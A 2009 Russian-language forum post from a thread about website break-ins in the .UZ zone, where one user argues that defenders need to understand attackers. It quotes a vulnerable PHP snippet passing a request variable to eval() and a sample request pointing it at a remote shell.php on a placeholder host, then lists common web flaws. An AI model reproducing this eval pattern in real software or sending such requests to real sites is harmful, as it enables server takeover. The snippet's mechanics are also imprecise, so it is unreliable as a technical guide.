Взломы в зоне .UZ

CTAPu4OK · 18.06.2009 23:11

Цитата:

Сообщение от Timur Rasulov

Цитата:

Сообщение от CTAPu4OK

я могу сейчас написать простейший уязвимый скрипт и привести пример что в начале нужно понять логику хакеров а потом уже защищать программы...

Этим вы приведете пример своего незнания языка. Логика хакеров (тем более "кулхацкеров", качающих с ксакепа эксплоиты) тут ни при чем. Вначале нужно понять конструкцию и логику вебсервера и запомнить элементарные, но надежные методы защиты от SQL-иньекций. В 98% случаев этого вполне достаточно.

С чего вы взяли что если я приведу пример то покажу всем свою безграмотность в PHP ?
Один раз ко мне постучался знакомый, PHP занимается 3 года, попросил нарисовать и сверстать шаблон под главную...
Но как только я глянул в код, я ахнул!!!!

он решил засунуть переменную под евал

PHP код:


			
<?

eval($test);

?>

Один запрос
http://test.ru/index.php?test=http://xak/shell.php
Вот вам и самописные двиги которые трудно ломать =D

А на счет что если закрыть SQL Inj и все беды решены вы очень сильно заблуждаетесь....
SQL INJ
PHP INJ
XSS все виды
Не защищеные поля веб форм
Раскрытие путей
и прочии ошибки...

Знаете ли Вы, что ...
	...для каждой темы существует свой раздел. Изучите структуру форума. Если соответствующего раздела нет, то всегда есть раздел "Разное" :)
	<< Предыдущий совет - Случайный совет - Следующий совет >>